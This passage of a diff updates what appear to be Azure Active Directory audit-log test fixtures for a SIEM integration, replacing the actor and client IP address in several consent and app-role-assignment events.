Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; 
\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -24859,9 +24859,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-11T16:45:42",
 "ExtendedProperties": [
 {
@@ -25096,7 +25096,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"
UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to 
user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"t
argetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"
Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -25126,9 +25126,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:42", "ExtendedProperties": [ { 
@@ -25357,7 +25357,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"
UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to 
user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"t
argetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"
Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -25387,9 +25387,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:42", "ExtendedProperties": [ { 
